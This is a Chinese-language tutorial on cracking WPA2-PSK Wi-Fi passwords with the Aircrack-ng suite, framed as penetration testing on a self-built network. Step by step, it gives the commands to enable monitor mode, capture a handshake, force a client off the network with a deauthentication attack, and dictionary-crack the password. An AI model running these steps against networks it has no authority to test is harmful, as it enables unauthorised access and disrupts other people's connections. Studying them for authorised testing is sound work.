本文內容:
- Aircrack-ng簡介
- WIFI破解配置要求
- WIFI破解的流程
- 擴展思路如何繼續滲透測試
1,Aircrack-ng簡介:
Aircrack-ng是一個與802.11標准[無線網絡標准]的無線網絡分析有關的安全軟件,主要功能:網絡偵測,數據包嗅探,WEB和WPA/WPA2-PS破解。
Aircrack-ng可以工作在任何支持監聽模式的無線網卡上並嗅探802.11a,802.11b,802.11g的數據。
可以在Linux和Windows上運行。
開源項目:https://github.com/aircrack-ng/aircrack-ng
官網:https://www.aircrack-ng.org/
官方指南:https://www.aircrack-ng.org/doku.php
教程:https://www.aircrack-ng.org/~~V/doku.php?id=tutorial
aircrack-ng套件包含有:
aircrack-ng 破解wep以及wpa[字典攻擊]秘鑰
airdecap-ng 通過已知秘鑰來解密web或wpa嗅探數據
airmon-ng 將網卡設置為監聽模式
aireplay-ng 數據包嗅探:將無線網絡數據輸送到PCAP貨IVS文件並顯示網絡信息
airtun-ng 創建虛擬管道
airolib-ng 保存、管理ESSID密碼列表
2,WIFI破解配置要求:
1.自建WIFI進行測試。
2.外置網卡設備[RT3070]:可以自己買個,不需要多好十幾塊錢就可以。
3.信號穩定
3,WIFI破解的流程:
Aircrak-ng破解WAP2-PSK:
1.查看網卡設備:
命令:ifconfig / iwconfig
2.查看是否支持監聽模式:
命令:airmon-ng
3.開啟無線網卡監控模式
命令:airmon-ng start wlan() 通過查看,wlan0多了一個mon,證明開啟成功
4.查看周圍WIFI網絡:
命令:airodump-ng wlan0mon
5.監聽目標網絡的握手包:
命令:airodump-ng -c 11 --bassid 2C:57:31:60:27:E6 -w ~/1/ wlan0mon
參數解釋:ESSID:為WIFI名字。
-c 指定頻道[信道]號 CH:信道
-bassid 指定路由器bassid MAC地址
-w 指定抓取的數據包保存位置 1:文件名
wlan0mon 開啟
如果沒有[WPA handshake:MAC地址],就可以強制讓它斷開,重新連接,看是否能抓到數據包
6.強制對方WIFI斷開重連[獲取握手包]
命令:aireplay-ng -0 2 -a 2C:57:31:60:27:E6 -c 60:AB:67:F2:F5:A8 wlan0mon
參數解釋:
-0 表示發起[鑒權] deauthentication攻擊 2 為鑒權等級。
-a 指定無線路由器[開啟wifi設備的MAC地址]BSSID
-c 指定強制斷開的設備[鏈接wifi設備的MAC地址]
wlan0mon 開啟
7.破解握手包密碼:
命令:aircrack-ng -a2 -b 52:8F:4C:67:B1:91 -w pass.txt ~/1/*.cap
參數解釋:
-a2 代表WPA的握手包
-b 指定要破解的WIFI[MAC地址] BSSID
-w 指定字典文件
8.關閉監聽模式:
命令:airmon-ng stop wlan0mon
破解密碼鏈接之前要關閉監聽模式
4,擴展思路如何繼續滲透測試:
WIFI密碼后的擴展思路:
想想我們的滲透測試思路:
1.信息收集
2.漏洞掃描
3.漏洞利用
4.獲取權限
5.權限維持
6.整理思路